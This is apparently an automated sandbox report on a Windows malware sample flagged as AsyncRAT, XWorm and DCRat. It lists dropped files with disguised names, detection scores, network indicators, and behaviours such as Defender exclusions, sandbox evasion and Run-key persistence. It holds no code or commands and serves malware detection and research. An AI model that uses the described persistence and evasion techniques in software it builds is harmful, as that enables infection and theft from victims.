                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561596 Sample: EsgeCzT4do.exe Startdate: 23/11/2024 Architecture: WINDOWS Score: 100 68 ip-api.com 2->68 80 Found malware configuration 2->80 82 Malicious sample detected (through community Yara rule) 2->82 84 Antivirus detection for dropped file 2->84 86 22 other signatures 2->86 9 EsgeCzT4do.exe 11 2->9         started        signatures3 process4 file5 60 C:\...\Windows Shell Experience Host.exe, PE32 9->60 dropped 62 C:\Users\user\...\SAM X CHEAT crack1.exe, PE32+ 9->62 dropped 64 C:\...\Realtek HD Audio Universal Service.exe, PE32 9->64 dropped 90 Creates files with lurking names (e.g. Crack.exe) 9->90 13 Windows Shell Experience Host.exe 14 3 9->13         started        16 Realtek HD Audio Universal Service.exe 14 3 9->16         started        19 SAM X CHEAT crack1.exe 15 9->19         started        signatures6 process7 dnsIp8 92 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 13->92 94 Adds a directory exclusion to Windows Defender 13->94 21 powershell.exe 13->21         started        24 powershell.exe 13->24         started        26 powershell.exe 13->26         started        28 powershell.exe 13->28         started        66 ip-api.com 208.95.112.1, 49706, 49707, 80 TUT-ASUS United States 16->66 30 powershell.exe 16->30         started        32 powershell.exe 16->32         started        34 powershell.exe 16->34         started        36 chrome.exe 9 19->36         started        39 conhost.exe 19->39         started        signatures9 process10 dnsIp11 41 conhost.exe 21->41         started        43 conhost.exe 24->43         started        45 conhost.exe 26->45         started        47 conhost.exe 28->47         started        88 Loading BitLocker PowerShell Module 30->88 49 conhost.exe 30->49         started        51 conhost.exe 32->51         started        53 conhost.exe 34->53         started        70 192.168.2.5, 443, 49703, 49706 unknown unknown 36->70 72 239.255.255.250 unknown Reserved 36->72 55 chrome.exe 36->55         started        58 2 other processes 36->58 signatures12 process13 dnsIp14 74 www.google.com 142.250.181.100, 443, 49720 GOOGLEUS United States 55->74 76 a.nel.cloudflare.com 35.190.80.1 GOOGLEUS United States 55->76 78 4 other IPs or domains 55->78

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          EsgeCzT4do.exe84%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                          EsgeCzT4do.exe100%AviraHEUR/AGEN.1338659
                          EsgeCzT4do.exe100%Joe Sandbox ML
                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe100%AviraTR/Spy.Gen
                          C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe100%AviraTR/Spy.Gen
                          C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe79%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                          C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe49%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe92%ReversingLabsByteCode-MSIL.Backdoor.XWorm
                          No Antivirus matches
                          No Antivirus matches
                          SourceDetectionScannerLabelLink
                          147.185.221.200%Avira URL Cloudsafe
                          NameIPActiveMaliciousAntivirus DetectionReputation
                          discord.gg
                          162.159.130.234
                          truefalse
                            high
                            a.nel.cloudflare.com
                            35.190.80.1
                            truefalse
                              high
                              discord.com
                              162.159.137.232
                              truefalse
                                high
                                cdn.discordapp.com
                                162.159.129.233
                                truefalse
                                  high
                                  ip-api.com
                                  208.95.112.1
                                  truefalse
                                    high
                                    www.google.com
                                    142.250.181.100
                                    truefalse
                                      high
                                      NameMaliciousAntivirus DetectionReputation
                                      https://discord.com/assets/ed216fb74081c12ffece.jsfalse
                                        high
                                        https://discord.com/assets/9017b7062734e72bb476.svgfalse
                                          high
                                          https://discord.com/assets/822c37e354b4a39dd6ca.jsfalse
                                            high
                                            https://cdn.discordapp.com/icons/1250434927087058944/06f5aa2f0dfc1da41888860135dc216c.webp?size=64false
                                              high
                                              https://discord.com/assets/5067a2ec1b24a6de868c.jsfalse
                                                high
                                                https://discord.com/assets/a5ec2b74d0cc337d4481.svgfalse
                                                  high
                                                  https://a.nel.cloudflare.com/report/v4?s=GiAivlQtaD9GFJpm8xZYxExManF7Z4bjXM9JozZdyf6DeKZXSfqB%2B6NDWkMbwIw7UwFSHVtJxSekpD7StZihTgeNBbq1NWruszvBEErrBxoJl2IPt7dHhSEyET8Gfalse
                                                    high
                                                    https://discord.com/assets/webMinimal.3d98e446c302b2b42423.jsfalse
                                                      high
                                                      https://discord.com/assets/5430e9964fe8364e084d.svgfalse
                                                        high
                                                        https://discord.com/assets/ecff74bf4394e6e58dd1.woff2false
                                                          high
                                                          https://discord.com/assets/1222195a37d6dd10994e.woff2false
                                                            high
                                                            https://discord.com/assets/af5116b1db004acbdb8b.svgfalse
                                                              high
                                                              https://discord.com/invite/BNXa5rYFXMfalse
                                                                high
                                                                https://discord.com/assets/f5b8aa3411dfc24ff2e6.woff2false
                                                                  high
                                                                  https://discord.com/assets/d4dcfe8e106a8072717f.jsfalse
                                                                    high
                                                                    https://discord.com/assets/c1b53be672aac192a996.woff2false
                                                                      high
                                                                      https://discord.com/api/v9/auth/location-metadatafalse
                                                                        high
                                                                        https://discord.com/assets/1098b8da25f51e58cea4.jsfalse
                                                                          high
                                                                          https://discord.com/assets/8234e0a75aa9afb205bd.woff2false
                                                                            high
                                                                            https://discord.com/api/v9/sciencefalse
                                                                              high
                                                                              https://discord.com/assets/8143f89919f42e84b455.jsfalse
                                                                                high
                                                                                https://discord.com/assets/771babda7e3dcee4f677.jsfalse
                                                                                  high
                                                                                  https://discord.com/assets/b21c5111a12372139409.woff2false
                                                                                    high
                                                                                    https://discord.com/assets/2597d11c1e039607373e.svgfalse
                                                                                      high
                                                                                      https://discord.com/assets/sentry.0a75547723fa3698c125.jsfalse
                                                                                        high
                                                                                        https://discord.com/assets/3c99eb87778b9ed038d5.jsfalse
                                                                                          high
                                                                                          https://discord.com/assets/f587337433e36ce917bd.jsfalse
                                                                                            high
                                                                                            https://discord.com/assets/2917679ca8a08c390036.cssfalse
                                                                                              high
                                                                                              https://discord.com/assets/410a2166a48c9e482e2a.svgfalse
                                                                                                high
                                                                                                147.185.221.20true
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://discord.com/assets/a6f6204cd40c3c5f5c14.jsfalse
                                                                                                  high
                                                                                                  https://discord.com/assets/05bd1eb5dea5ee3387f4.jsfalse
                                                                                                    high
                                                                                                    https://a.nel.cloudflare.com/report/v4?s=x3K2CLqwhXLFkIv8%2FtEWtlMII%2BNHxQ8tHY7DQ1Nux55gkB4QzYtVftg9FhBongq00wL789ErxqlAVWLd4IIOI9P3K4WT39L%2Fg5swK%2Bkcwt%2B1UczC6L7zJ%2B9p4cHDfalse
                                                                                                      high
                                                                                                      https://discord.com/assets/0e5029fd9cd4812b6712.svgfalse
                                                                                                        high
                                                                                                        https://discord.com/assets/8bd8143eff37936894aa.woff2false
                                                                                                          high
                                                                                                          https://discord.com/assets/09a6f112fcbc17f6cfd4.jsfalse
                                                                                                            high
                                                                                                            https://discord.com/assets/55ad931ed92a15c15709.jsfalse
                                                                                                              high
                                                                                                              https://discord.com/assets/452d7be36bf4b23241bd.woff2false
                                                                                                                high
                                                                                                                https://discord.com/assets/d67c5e680608266a1f63.jsfalse
                                                                                                                  high
                                                                                                                  https://discord.com/assets/ab03f7053698d417194c.svgfalse
                                                                                                                    high
                                                                                                                    https://discord.com/cdn-cgi/challenge-platform/h/g/jsd/r/8e73d00e4bfe422efalse
                                                                                                                      high
                                                                                                                      https://discord.com/assets/52015caea7357a7a60a9.jsfalse
                                                                                                                        high
                                                                                                                        https://discord.com/assets/8e217faefc0006e5a018.jsfalse
                                                                                                                          high
                                                                                                                          https://discord.com/assets/favicon.icofalse
                                                                                                                            high
                                                                                                                            https://discord.com/assets/0a52c6142094387fceed.jsfalse
                                                                                                                              high
                                                                                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                              https://discord.com/invite/BNXa5rYFXM?locale=vichromecache_172.8.drfalse
                                                                                                                                high
                                                                                                                                https://api.telegram.org/botWindows Shell Experience Host.exe, 00000003.00000000.2044758866.0000000000CA2000.00000002.00000001.01000000.00000006.sdmp, Windows Shell Experience Host.exe.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://discord.com/invite/BNXa5rYFXM?locale=nlchromecache_172.8.drfalse
                                                                                                                                    high
                                                                                                                                    http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 00000014.00000002.2880384174.00000287D6C60000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3491603064.0000027B606F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://discordapp.comchromecache_172.8.drfalse
                                                                                                                                        high
                                                                                                                                        https://discord.com/invite/BNXa5rYFXM?locale=elchromecache_172.8.drfalse
                                                                                                                                          high
                                                                                                                                          https://discord.com/invite/BNXa5rYFXM?locale=zh-TWchromecache_172.8.drfalse
                                                                                                                                            high
                                                                                                                                            https://discord.com/invite/BNXa5rYFXM?locale=ukchromecache_172.8.drfalse
                                                                                                                                              high
                                                                                                                                              https://nuget.org/nuget.exepowershell.exe, 0000000A.00000002.2237154955.0000014BE9CE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2489098317.0000016510078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2809515501.00000287CE518000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3045850370.00000242A1873000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3401686739.0000027B58150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3694255435.00000284AC981000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://discord.com/downloadchromecache_179.8.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://discord.com/invite/BNXa5rYFXM?locale=ltchromecache_172.8.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://discord.com/invite/BNXa5rYFXM?locale=dechromecache_172.8.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://discord.com/invite/BNXa5rYFXM?locale=zh-CNchromecache_172.8.drfalse
                                                                                                                                                        high
                                                                                                                                                        http://www.microsoft.cpowershell.exe, 0000000A.00000002.2247904986.0000014BF24B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000009.00000002.2262535346.0000019C3AB71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2207872648.0000014BD9C71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2299835745.0000016500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2510574801.00000287BE4A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2700642447.0000024291801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2979037416.0000027B480E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3256516329.000002849C911000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://discord.com/invite/BNXa5rYFXM?locale=en-GBchromecache_172.8.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://discord.comchromecache_172.8.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://discord.com/invite/BNXa5rYFXM?locale=es-419chromecache_172.8.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001B.00000002.3256516329.000002849CB39000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000009.00000002.2262535346.0000019C3AD98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2207872648.0000014BD9E9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2299835745.0000016500229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2510574801.00000287BE6C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2700642447.0000024291A28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2979037416.0000027B48309000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3256516329.000002849CB39000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://discord.com/invite/BNXa5rYFXM?locale=hechromecache_172.8.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001B.00000002.3256516329.000002849CB39000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://discord.com/guidelineschromecache_179.8.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://crl.micpowershell.exe, 00000017.00000002.3126653247.00000242A9F0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://contoso.com/Iconpowershell.exe, 0000001B.00000002.3694255435.00000284AC981000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://discord.com/invite/BNXa5rYFXM?locale=plchromecache_172.8.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://nsis.sf.net/NSIS_ErrorErrorEsgeCzT4do.exefalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://github.com/Pester/Pesterpowershell.exe, 0000001B.00000002.3256516329.000002849CB39000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://discord.gg/fortnitechromecache_179.8.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://nsis.sf.net/NSIS_ErrorEsgeCzT4do.exefalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000009.00000002.2262535346.0000019C3AD98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2207872648.0000014BD9E9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2299835745.0000016500229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2510574801.00000287BE6C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2700642447.0000024291A28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2979037416.0000027B48309000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3256516329.000002849CB39000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://discord.com/invite/BNXa5rYFXM?locale=nochromecache_172.8.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://discord.com/invite/BNXa5rYFXM?locale=fichromecache_172.8.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://discord.com/invite/BNXa5rYFXM?locale=sv-SEchromecache_172.8.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://discord.com/invite/BNXa5rYFXM?locale=frchromecache_172.8.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://discord.com/invite/BNXa5rYFXM?locale=jachromecache_172.8.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://discord.com/invite/BNXa5rYFXM?locale=archromecache_172.8.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://discord.com/invite/BNXa5rYFXM?locale=rochromecache_172.8.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://contoso.com/Licensepowershell.exe, 0000001B.00000002.3694255435.00000284AC981000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://discord.com/invite/BNXa5rYFXM?locale=itchromecache_172.8.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://discord.com/blog/important-policy-updateschromecache_179.8.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://contoso.com/powershell.exe, 0000001B.00000002.3694255435.00000284AC981000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://discord.com/invite/BNXa5rYFXM?locale=idchromecache_172.8.drfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://discord.com/invite/BNXa5rYFXM?locale=hichromecache_172.8.drfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://discord.com/invite/BNXa5rYFXM?locale=huchromecache_172.8.drfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://support.discord.com/hc/en-us/articles/360017693772-Managing-Subscriptions-and-Billing-FAQchromecache_179.8.drfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://support.discord.com/hc/en-us/articles/4410339366295-Paid-Services-Termschromecache_179.8.drfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://discord.com/invite/BNXa5rYFXM?locale=hrchromecache_172.8.drfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              http://nuget.org/NuGet.exepowershell.exe, 0000000A.00000002.2237154955.0000014BE9CE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2489098317.0000016510078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2809515501.00000287CE518000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.3045850370.00000242A1873000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3401686739.0000027B58150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3694255435.00000284AC981000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://twitter.com/discordchromecache_179.8.drfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://discord.com/invite/BNXa5rYFXM?locale=thchromecache_172.8.drfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://discord.com/invite/BNXa5rYFXM?locale=dachromecache_172.8.drfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://discord.com/invite/BNXa5rYFXM?locale=trchromecache_172.8.drfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        https://discord.com/invite/BNXa5rYFXM?locale=es-ESchromecache_172.8.drfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          https://discord.com/invite/BNXa5rYFXM?locale=kochromecache_172.8.drfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                            • 75% < No. of IPs
                                                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                            142.250.181.100
                                                                                                                                                                                                                                            www.google.comUnited States
                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                            208.95.112.1
                                                                                                                                                                                                                                            ip-api.comUnited States
                                                                                                                                                                                                                                            53334TUT-ASUSfalse
                                                                                                                                                                                                                                            162.159.130.234
                                                                                                                                                                                                                                            discord.ggUnited States
                                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                            162.159.137.232
                                                                                                                                                                                                                                            discord.comUnited States
                                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                            239.255.255.250
                                                                                                                                                                                                                                            unknownReserved
                                                                                                                                                                                                                                            unknownunknownfalse
                                                                                                                                                                                                                                            162.159.129.233
                                                                                                                                                                                                                                            cdn.discordapp.comUnited States
                                                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                            35.190.80.1
                                                                                                                                                                                                                                            a.nel.cloudflare.comUnited States
                                                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                                                            IP
                                                                                                                                                                                                                                            192.168.2.5
                                                                                                                                                                                                                                            127.0.0.1
                                                                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                            Analysis ID:1561596
                                                                                                                                                                                                                                            Start date and time:2024-11-23 21:11:09 +01:00
                                                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                            Overall analysis duration:0h 9m 6s
                                                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                            Number of analysed new started processes analysed:29
                                                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                                                            Sample name:EsgeCzT4do.exe
                                                                                                                                                                                                                                            renamed because original name is a hash value
                                                                                                                                                                                                                                            Original Sample Name:3ac3efee88adab86a250a53dd9448453fcc4223662f5c6c21453606b6eb91b77.exe
                                                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                                                            Classification:mal100.phis.troj.spyw.evad.winEXE@49/186@17/9
                                                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                                                            • Successful, ratio: 14.3%
                                                                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                                                                                                            • Number of executed functions: 77
                                                                                                                                                                                                                                            • Number of non-executed functions: 43
                                                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 172.217.21.35, 172.217.19.238, 64.233.165.84, 34.104.35.123, 2.20.68.210, 192.229.221.95, 142.250.181.138, 142.250.181.74, 142.250.181.42, 172.217.17.74, 172.217.17.42, 172.217.19.234, 142.250.181.106, 172.217.19.202, 216.58.208.234, 172.217.17.35, 172.217.17.78
                                                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, clients.l.google.com
                                                                                                                                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 4072 because it is empty
                                                                                                                                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 7120 because it is empty
                                                                                                                                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 7340 because it is empty
                                                                                                                                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 7348 because it is empty
                                                                                                                                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 8520 because it is empty
                                                                                                                                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 8932 because it is empty
                                                                                                                                                                                                                                            • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                            • VT rate limit hit for: EsgeCzT4do.exe
                                                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                                                            15:12:11API Interceptor161x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                            21:14:36AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Realtek HD Audio Universal Service C:\Users\user\AppData\Roaming\Realtek HD Audio Universal Service.exe
                                                                                                                                                                                                                                            21:14:44AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Realtek HD Audio Universal Service C:\Users\user\AppData\Roaming\Realtek HD Audio Universal Service.exe
                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            208.95.112.1dLRcE11Dkl.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                                            owuP726k3d.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                                            WV7Gj9lJ7W.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                                            18sFhgSyVK.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                                            UH7iNNKgPW.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                                            18fvs4AVae.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                                            cmd.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                            • ip-api.com/json/?fields=225545
                                                                                                                                                                                                                                            z81zEuzkJPHHV3KYua.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                                            Listing_error_15_code_file-002.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                                                                            • ip-api.com/json/
                                                                                                                                                                                                                                            Listing_error_15_code_file-002.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                                                                            • ip-api.com/json/
                                                                                                                                                                                                                                            162.159.130.234Fa1QSXjTZD.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              SecuriteInfo.com.Win64.MalwareX-gen.18133.14409.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                                                                                                https://bafybeihvxlpwztcsbtbuj36rnn3o3ay7otib4fthnaja4oe34dddvnbfcm.ipfs.dweb.link/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  https://clicker.extremelyorange.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    Monolith.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      http://www.ms4x.netGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        https://ipfs.io/ipfs/bafkreidlod2sf2qbeojthpzmf5gwqoobb7cnvdzcjrrzlcamwvyml57gry#electronics@victrex.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          https://ipfs.io/ipfs/bafkreihautmmzqkuyabmbht3wi6czre2h5vr2nu626geog3db3d5676rma?filename=Session.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            Client-built.bin.exeGet hashmaliciousDiscord RatBrowse
                                                                                                                                                                                                                                                              87Bym0x4Fy.exeGet hashmaliciousBlank Grabber, DCRat, Discord Rat, PureLog Stealer, Xmrig, zgRATBrowse
                                                                                                                                                                                                                                                                162.159.137.232program.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                                                                  NEVER OPEN!.exeGet hashmaliciousPython Stealer, Empyrean, Discord Token StealerBrowse
                                                                                                                                                                                                                                                                    YDW0S5K7hi.exeGet hashmaliciousSilverRatBrowse
                                                                                                                                                                                                                                                                      Xyq6rvzLJs.exeGet hashmaliciousSilverRatBrowse
                                                                                                                                                                                                                                                                        CFuejz2dRu.exeGet hashmaliciousDiscord Token StealerBrowse
                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            SecuriteInfo.com.FileRepMalware.22561.28030.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                                                                                                                                                                                                                              570ZenR882.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                Ff0ZjqSI9Y.exeGet hashmaliciousUnknownBrowse
